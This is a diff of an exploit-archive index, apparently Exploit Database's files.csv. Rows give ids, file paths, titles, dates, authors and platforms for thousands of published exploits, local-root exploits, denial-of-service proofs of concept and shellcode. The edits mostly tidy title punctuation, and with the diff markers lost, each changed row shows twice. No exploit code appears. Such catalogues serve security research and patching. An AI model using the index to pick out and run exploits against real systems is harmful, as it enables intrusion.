19897,platforms/windows/remote/19897.txt,"FrontPage 2000_IIS 4.0/5.0 Server Extensions Path Disclosure",2000-05-06,"Frankie Zie",windows,remote,0
19898,platforms/php/webapps/19898.txt,"Forum Oxalis <= 0.1.2 - SQL Injection",2012-07-17,"Jean Pascal Pereira",php,webapps,0
19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
@ -18039,7 +18039,7 @@ id,file,description,date,author,platform,type,port
20728,platforms/windows/dos/20728.txt,"602Pro Lan Suite 2000a - Long HTTP Request Denial of Service",2001-04-05,nitr0s,windows,dos,0
20729,platforms/php/webapps/20729.txt,"PHP-Nuke 1.0/2.5/3.0/4.x - Remote Ad Banner URL Change",2001-04-02,"Juan Diego",php,webapps,0
20730,platforms/unix/remote/20730.c,"IPFilter 3.x Fragment Rule Bypass",2001-04-09,"Thomas Lopatic",unix,remote,0
20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2_NetBSD 1.2-4.5_OpenBSD 2.x ftpd glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
20731,platforms/bsd/remote/20731.c,"FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - glob() Buffer Overflow",2001-04-14,"fish stiqz",bsd,remote,0
20732,platforms/freebsd/remote/20732.pl,"freebsd 4.2-stable ftpd glob() Buffer Overflow Vulnerabilities",2001-04-16,"Elias Levy",freebsd,remote,0
20733,platforms/openbsd/remote/20733.c,"OpenBSD 2.x-2.8 ftpd glob() Buffer Overflow",2001-04-16,"Elias Levy",openbsd,remote,0
20734,platforms/hardware/dos/20734.sh,"Cisco PIX 4.x/5.x TACACS+ - Denial of Service",2001-04-06,"Claudiu Calomfirescu",hardware,dos,0
@ -18641,7 +18641,7 @@ id,file,description,date,author,platform,type,port
21361,platforms/windows/remote/21361.txt,"Microsoft Internet Explorer 5 Cascading Style Sheet File Disclosure",2002-04-02,"GreyMagic Software",windows,remote,0
21362,platforms/linux/local/21362.c,"Oracle 8i TNS Listener Local Command Parameter Buffer Overflow",2002-04-01,"the itch",linux,local,0
21363,platforms/unix/remote/21363.c,"Icecast 1.x AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0
21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0
21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0
21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript ActiveX Word Object DoS",2002-04-08,"Elia Florio",windows,dos,0
21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0
@ -18943,7 +18943,7 @@ id,file,description,date,author,platform,type,port
21666,platforms/linux/local/21666.txt,"soapbox <= 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0
21667,platforms/linux/local/21667.c,"MM 1.0.x/1.1.x - Shared Memory Library Temporary File Privilege Escalation",2002-07-29,"Sebastian Krahmer",linux,local,0
21668,platforms/php/webapps/21668.txt,"ShoutBox 1.2 Form Field HTML Injection",2002-07-29,delusion,php,webapps,0
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x_NetBSD 1.4.x/1.5.x/1.6_OpenBSD 3 pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
21669,platforms/bsd/local/21669.pl,"FreeBSD 4.x / NetBSD 1.4.x/1.5.x/1.6 / OpenBSD 3 - pppd Arbitrary File Permission Modification Race Condition",2002-07-29,"Sebastian Krahmer",bsd,local,0
21670,platforms/windows/remote/21670.txt,"Microsoft Windows Media Player 6/7 Filename Buffer Overflow",2002-07-30,ken@FTU,windows,remote,0
21671,platforms/unix/remote/21671.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (1)",2002-07-30,spabam,unix,remote,0
21672,platforms/unix/remote/21672.c,"OpenSSL SSLv2 - Malformed Client Key Remote Buffer Overflow (2)",2002-07-30,spabam,unix,remote,0
@ -20079,7 +20079,7 @@ id,file,description,date,author,platform,type,port
22837,platforms/windows/remote/22837.c,"Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow",2003-06-25,firew0rker,windows,remote,0
22838,platforms/windows/remote/22838.txt,"BRS WebWeaver 1.0 Error Page Cross-Site Scripting",2003-06-26,"Carsten H. Eiram",windows,remote,0
22839,platforms/linux/dos/22839.c,"methane IRCd 0.1.1 - Remote Format String",2003-06-27,Dinos,linux,dos,0
22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
22840,platforms/linux/local/22840.c,"Linux Kernel 2.4 - suid execve() System Call Race Condition PoC",2003-06-26,IhaQueR,linux,local,0
22841,platforms/php/webapps/22841.txt,"iXmail 0.2/0.3 iXmail_NetAttach.php File Deletion",2003-06-26,leseulfrog,php,webapps,0
22842,platforms/php/webapps/22842.txt,"CutePHP CuteNews 1.3 HTML Injection",2003-06-29,"Peter Winter-Smith",php,webapps,0
22843,platforms/cgi/webapps/22843.txt,"MegaBook 1.1/2.0/2.1 - Multiple HTML Injection Vulnerabilities",2003-06-29,"Morning Wood",cgi,webapps,0
@ -22427,7 +22427,7 @@ id,file,description,date,author,platform,type,port
25284,platforms/php/webapps/25284.txt,"Nuke Bookmarks 0.6 Marks.php SQL Injection",2005-03-26,"Gerardo Astharot Di Giacomo",php,webapps,0
25285,platforms/php/webapps/25285.txt,"MagicScripts E-Store Kit-2 PayPal Edition Cross-Site Scripting",2005-03-26,Dcrab,php,webapps,0
25286,platforms/php/webapps/25286.txt,"MagicScripts E-Store Kit-2 PayPal Edition Remote File Include",2005-03-26,Dcrab,php,webapps,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index PoC (1)",2005-03-28,"ilja van sprundel",linux,local,0
25287,platforms/linux/local/25287.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1)",2005-03-28,"ilja van sprundel",linux,local,0
25288,platforms/linux/local/25288.c,"Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Local Root (2)",2005-04-08,qobaiashi,linux,local,0
25289,platforms/linux/local/25289.c,"Linux Kernel <= 2.4.30 / <= 2.6.11.5 - Bluetooth bluez_sock_create Local Root",2005-10-19,backdoored.net,linux,local,0
25291,platforms/multiple/remote/25291.txt,"Tincat Network Library Remote Buffer Overflow",2005-03-28,"Luigi Auriemma",multiple,remote,0
@ -23275,7 +23275,7 @@ id,file,description,date,author,platform,type,port
26128,platforms/osx/dos/26128.html,"Apple Safari 1.3 Web Browser JavaScript Invalid Address Denial of Service",2005-08-09,"Patrick Webster",osx,dos,0
26129,platforms/hardware/webapps/26129.txt,"Buffalo WZR-HP-G300NH2 - CSRF",2013-06-11,"Prayas Kulshrestha",hardware,webapps,0
26130,platforms/windows/dos/26130.py,"WinRadius 2.11 - Denial of Service",2013-06-11,npn,windows,dos,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - perf_swevent_init Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
26131,platforms/linux/local/26131.c,"Linux Kernel < 3.8.9 (x86_64) - 'perf_swevent_init' Local Root Exploit (2)",2013-06-11,"Andrea Bittau",linux,local,0
26132,platforms/php/webapps/26132.txt,"Fobuc Guestbook 0.9 - SQL Injection",2013-06-11,"CWH Underground",php,webapps,0
26133,platforms/windows/dos/26133.py,"Sami FTP Server 2.0.1 - RETR Denial of Service",2013-06-11,Chako,windows,dos,21
26134,platforms/windows/remote/26134.rb,"Synactis PDF In-The-Box ConnectToSynactic Stack Buffer Overflow",2013-06-11,Metasploit,windows,remote,0
@ -26233,7 +26233,7 @@ id,file,description,date,author,platform,type,port
29201,platforms/osx/local/29201.c,"Apple Mac OS X 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
29202,platforms/php/webapps/29202.txt,"Seditio1.10 /Land Down 8.0 Under Polls.php SQL Injection",2006-11-30,ajann,php,webapps,0
29203,platforms/php/webapps/29203.php,"Woltlab Burning Board 2.3.x Register.php Cross-Site Scripting",2006-11-30,blueshisha,php,webapps,0
29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 Ftpd and Tnftpd Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
29204,platforms/netbsd_x86/dos/29204.pl,"NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow",2006-12-01,kcope,netbsd_x86,dos,0
29205,platforms/php/webapps/29205.txt,"Invision Gallery 2.0.7 Index.php IMG Parameter SQL Injection",2006-12-01,infection,php,webapps,0
29262,platforms/hardware/webapps/29262.pl,"Pirelli Discus DRG A125g - Password Disclosure",2013-10-28,"Sebastián Magof",hardware,webapps,0
29207,platforms/php/webapps/29207.txt,"DZCP (deV!L_z Clanportal) 1.3.6 - Show Parameter SQL Injection",2006-12-01,"Tim Weber",php,webapps,0
@ -30064,7 +30064,7 @@ id,file,description,date,author,platform,type,port
33314,platforms/linux/dos/33314.html,"Mozilla Firefox <= 3.0.14 - Remote Memory Corruption",2009-10-27,"Carsten Book",linux,dos,0
33315,platforms/linux/remote/33315.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (1)",2009-10-29,Tometzky,linux,remote,0
33316,platforms/multiple/remote/33316.java,"Sun Java SE November 2009 - Multiple Security Vulnerabilities (2)",2009-10-29,Tometzky,multiple,remote,0
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 and NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33318,platforms/bsd/dos/33318.txt,"OpenBSD 4.6 / NetBSD 5.0.1 - 'printf(1)' Format String Parsing Denial of Service",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33319,platforms/bsd/dos/33319.txt,"Multiple BSD Distributions 'printf(3)' Memory Corruption",2009-10-30,"Maksymilian Arciemowicz",bsd,dos,0
33320,platforms/php/webapps/33320.txt,"TFTgallery 0.13 - 'sample' Parameter Cross-Site Scripting",2009-11-02,blake,php,webapps,0
33321,platforms/linux/local/33321.c,"Linux Kernel 2.6.x (2.6.0 <= 2.6.31) - 'pipe.c' Local Privilege Escalation (1)",2009-11-03,"teach & xipe",linux,local,0
@ -30218,7 +30218,7 @@ id,file,description,date,author,platform,type,port
33574,platforms/php/webapps/33574.txt,"Discuz! 6.0 - 'tid' Parameter Cross-Site Scripting",2010-01-27,s4r4d0,php,webapps,0
33575,platforms/cfm/webapps/33575.txt,"CommonSpot Server 'utilities/longproc.cfm' Cross-Site Scripting",2010-01-28,"Richard Brain",cfm,webapps,0
33576,platforms/linux/local/33576.txt,"Battery Life Toolkit 1.0.9 - 'bltk_sudo' Local Privilege Escalation",2010-01-28,"Matthew Garrett",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04.0/1/2 x64) - perf_swevent_init Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33589,platforms/linux/local/33589.c,"Linux Kernel <= 3.2.0-23 / <= 3.5.0-23 (Ubuntu 12.04/12.04.1/12.04.2 x64) - 'perf_swevent_init' Local Root Exploit (3)",2014-05-31,"Vitaly Nikolenko",linux,local,0
33523,platforms/linux/local/33523.c,"Linux Kernel < 2.6.28 - 'fasync_helper()' Local Privilege Escalation",2009-12-16,"Tavis Ormandy",linux,local,0
33524,platforms/linux/dos/33524.txt,"OpenOffice 3.1 - (.csv) Remote Denial of Service",2010-01-14,"Hellcode Research",linux,dos,0
33525,platforms/php/remote/33525.txt,"Zend Framework <= 1.9.6 - Multiple Input Validation Vulnerabilities / Security Bypass Weakness",2010-01-14,"draic Brady",php,remote,0
@ -31418,7 +31418,7 @@ id,file,description,date,author,platform,type,port
34877,platforms/php/webapps/34877.txt,"DigiOz Guestbook 1.7.2 - 'search.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
34878,platforms/php/webapps/34878.txt,"StandAloneArcade 1.1 - 'gamelist.php' Cross-Site Scripting",2009-08-27,Moudi,php,webapps,0
34879,platforms/linux/remote/34879.txt,"OpenVPN 2.2.29 - Remote Exploit (Shellshock)",2014-10-04,"hobbily plunt",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 and Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
34881,platforms/linux/remote/34881.html,"Mozilla Firefox SeaMonkey <= 3.6.10 / Thunderbird <= 3.1.4 - 'document.write' Memory Corruption",2010-10-19,"Alexander Miller",linux,remote,0
34882,platforms/php/webapps/34882.html,"sNews 1.7 - 'snews.php' Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34883,platforms/php/webapps/34883.txt,"4Site CMS 2.6 - 'cat' Parameter SQL Injection",2010-10-19,"High-Tech Bridge SA",php,webapps,0
34884,platforms/php/webapps/34884.txt,"JCE-Tech SearchFeed Script 'index.php' Cross-Site Scripting",2009-08-26,Moudi,php,webapps,0
@ -31618,7 +31618,7 @@ id,file,description,date,author,platform,type,port
35092,platforms/multiple/remote/35092.html,"Helix Server 14.0.1.571 Administration Interface Cross-Site Request Forgery",2010-12-10,"John Leitch",multiple,remote,0
35093,platforms/cgi/webapps/35093.txt,"BizDir 05.10 - 'f_srch' Parameter Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",cgi,webapps,0
35094,platforms/php/webapps/35094.txt,"slickMsg 0.7-alpha 'top.php' Cross-Site Scripting",2010-12-10,"Aliaksandr Hartsuyeu",php,webapps,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35095,platforms/linux/remote/35095.txt,"Mozilla Firefox/Thunderbird/SeaMonkey - Multiple HTML Injection Vulnerabilities",2010-12-09,"Yosuke Hasegawa",linux,remote,0
35096,platforms/php/webapps/35096.txt,"Joomla! 'com_mailto' Component Multiple Cross-Site Scripting Vulnerabilities",2010-12-10,MustLive,php,webapps,0
35097,platforms/php/webapps/35097.txt,"Joomla Redirect Component 1.5.19 - 'com_redirect' Local File Include",2010-12-13,jos_ali_joe,php,webapps,0
35098,platforms/php/webapps/35098.txt,"Enalean Tuleap 7.4.99.5 - Blind SQL Injection",2014-10-28,Portcullis,php,webapps,80
@ -31867,7 +31867,7 @@ id,file,description,date,author,platform,type,port
35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0
35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS",2014-11-25,"Halil Dalabasmaz",php,webapps,80
35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service",2011-02-22,"Luigi Auriemma",multiple,dos,0
35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL/CentOS 7) - libfutex Local Root",2014-11-25,"Kaiqu Chen",linux,local,0
35370,platforms/linux/local/35370.c,"Linux Kernel <= 3.14.5 (RHEL / CentOS 7) - 'libfutex' Local Root Exploit",2014-11-25,"Kaiqu Chen",linux,local,0
35371,platforms/php/webapps/35371.txt,"WordPress Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80
35372,platforms/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80
35373,platforms/php/webapps/35373.txt,"WordPress GD Star Rating Plugin 1.9.7 - 'wpfn' Parameter Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps,0
@ -32384,7 +32384,7 @@ id,file,description,date,author,platform,type,port
35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80
35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0
35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' Functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0
35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 Multiple Cross Site Scripting Vulnerabilities",2011-07-04,"Stefan Schurtz",php,webapps,0
35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0
35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component 'controller' Parameter Local File Include",2011-07-05,FL0RiX,php,webapps,0
@ -32397,7 +32397,7 @@ id,file,description,date,author,platform,type,port
35929,platforms/php/webapps/35929.txt,"Joomla! 'com_voj' Component SQL Injection",2011-07-08,CoBRa_21,php,webapps,0
35930,platforms/php/webapps/35930.txt,"Prontus CMS 'page' Parameter Cross Site Scripting",2011-07-11,Zerial,php,webapps,0
35931,platforms/php/webapps/35931.txt,"ICMusic '1.2 music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias.",hardware,remote,0
35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0
35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal/XSS Vulnerabilities",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0
35934,platforms/osx/local/35934.txt,"OS X < 10.10.x - Gatekeeper bypass",2015-01-29,"Amplia Security Research",osx,local,0
35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
@ -32420,7 +32420,7 @@ id,file,description,date,author,platform,type,port
35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
35955,platforms/php/webapps/35955.txt,"Easy Estate Rental 's_location' Parameter SQL Injection",2011-07-15,Lazmania61,php,webapps,0
35956,platforms/php/webapps/35956.txt,"Joomla Foto Component 'id_categoria' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35957,platforms/linux/local/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,local,0
35957,platforms/linux/dos/35957.txt,"Linux Kernel 2.6.26 - Auerswald USB Device Driver Buffer Overflow (Proof of Concept)",2009-10-19,"R. Dominguez Veg",linux,dos,0
35958,platforms/php/webapps/35958.txt,"Joomla Juicy Gallery Component 'picId' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
35959,platforms/php/webapps/35959.txt,"Joomla! 'com_hospital' Component SQL Injection",2011-07-15,SOLVER,php,webapps,0
35960,platforms/php/webapps/35960.txt,"Joomla Controller Component 'Itemid' Parameter SQL Injection",2011-07-15,SOLVER,php,webapps,0
@ -33104,7 +33104,7 @@ id,file,description,date,author,platform,type,port
36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0
36690,platforms/linux/remote/36690.rb,"Barracuda Firmware <= 5.0.0.012 - Post Auth Remote Root exploit",2015-04-09,xort,linux,remote,8000
36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80
36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - rootpipe Local Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
36692,platforms/osx/local/36692.py,"Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0
36693,platforms/php/webapps/36693.txt,"RabbitWiki 'title' Parameter Cross Site Scripting",2012-02-10,sonyy,php,webapps,0
36694,platforms/php/webapps/36694.txt,"eFront Community++ 3.6.10 SQL Injection and Multiple HTML Injection Vulnerabilities",2012-02-12,"Benjamin Kunz Mejri",php,webapps,0
36695,platforms/php/webapps/36695.txt,"Zimbra 'view' Parameter Cross Site Scripting",2012-02-13,sonyy,php,webapps,0
@ -34349,7 +34349,7 @@ id,file,description,date,author,platform,type,port
38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0
38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0
38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements Rootpipe Privilege Escalation",2015-08-31,Metasploit,osx,local,0
38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0
38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 Cross Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0
38038,platforms/multiple/dos/38038.txt,"Splunk <= 4.3.1 Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0
38039,platforms/php/webapps/38039.txt,"openSIS 'modname' Parameter Local File Include",2012-11-20,"Julian Horoszkiewicz",php,webapps,0
@ -34378,7 +34378,7 @@ id,file,description,date,author,platform,type,port
38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0
38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0
38064,platforms/php/webapps/38064.txt,"WordPress CStar Design 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0
38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode - NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0
38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80
38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - Path Traversal",2015-09-02,HaHwul,php,webapps,80
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
@ -34402,7 +34402,7 @@ id,file,description,date,author,platform,type,port
38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin 'language' Parameter Local File Include",2012-12-30,Amirh03in,php,webapps,0
38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0
38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0
38136,platforms/osx/local/38136.txt,"OS X Install.framework suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38137,platforms/osx/local/38137.txt,"OS X Install.framework Arbitrary mkdir_ unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0
38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
@ -34735,7 +34735,7 @@ id,file,description,date,author,platform,type,port
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel 2.6.36 - 'NetUSB' Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection",2015-10-14,"Karn Ganeshen",hardware,webapps,0
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
38475,platforms/hardware/dos/38475.txt,"ZHONE < S3.0.501 - Multiple Remote Code Execution Vulnerabilities",2015-10-16,"Lyon Yang",hardware,dos,0
@ -35896,7 +35896,7 @@ id,file,description,date,author,platform,type,port
39968,platforms/windows/webapps/39968.txt,"Gemalto Sentinel License Manager 18.0.1.55505 - Directory Traversal",2016-06-16,LiquidWorm,windows,webapps,1947
39682,platforms/php/webapps/39682.txt,"RockMongo PHP MongoDB Administrator 1.1.8 - Multiple Vulnerabilities",2016-04-11,"Ozer Goker",php,webapps,80
39683,platforms/hardware/webapps/39683.txt,"Axis Network Cameras - Multiple Vulnerabilities",2016-04-11,Orwelllabs,hardware,webapps,80
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Pori: 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39684,platforms/lin_x86-64/shellcode/39684.c,"Linux/x86-64 - bindshell (Port 5600) shellcode (81 bytes)",2016-04-11,"Ajith Kp",lin_x86-64,shellcode,0
39685,platforms/android/dos/39685.txt,"Android - IOMX getConfig/getParameter Information Disclosure",2016-04-11,"Google Security Research",android,dos,0
39686,platforms/android/dos/39686.txt,"Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",android,dos,0
39687,platforms/jsp/webapps/39687.txt,"Novell Service Desk 7.1.0/7.0.3 / 6.5 - Multiple Vulnerabilities",2016-04-11,"Pedro Ribeiro",jsp,webapps,0
@ -35979,7 +35979,7 @@ id,file,description,date,author,platform,type,port
39769,platforms/linux/local/39769.txt,"Zabbix Agent 3.0.1 - mysql.size Shell Command Injection",2016-05-04,"Timo Lindfors",linux,local,0
39770,platforms/windows/dos/39770.txt,"McAfee LiveSafe 14.0 - Relocations Processing Memory Corruption",2016-05-04,"Google Security Research",windows,dos,0
39771,platforms/linux/dos/39771.txt,"Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow)",2016-05-04,"Google Security Research",linux,dos,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - double-fdput() in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
39772,platforms/linux/local/39772.txt,"Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Local Root Exploit",2016-05-04,"Google Security Research",linux,local,0
39773,platforms/linux/dos/39773.txt,"Linux Kernel (Ubuntu 16.04) - Reference Count Overflow Using BPF Maps",2016-05-04,"Google Security Research",linux,dos,0
39774,platforms/windows/dos/39774.html,"Baidu Spark Browser 43.23.1000.476 - Address Bar URL Spoofing",2016-05-05,"liu zhu",windows,dos,0
39775,platforms/windows/dos/39775.py,"RPCScan 2.03 - Hostname/IP Field Crash PoC",2016-05-06,"Irving Aguilar",windows,dos,0
@ -36173,7 +36173,7 @@ id,file,description,date,author,platform,type,port
39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
39973,platforms/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution",2016-06-17,Metasploit,linux,remote,443
39974,platforms/php/webapps/39974.html,"WordPress Ultimate Product Catalog Plugin 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",php,webapps,80
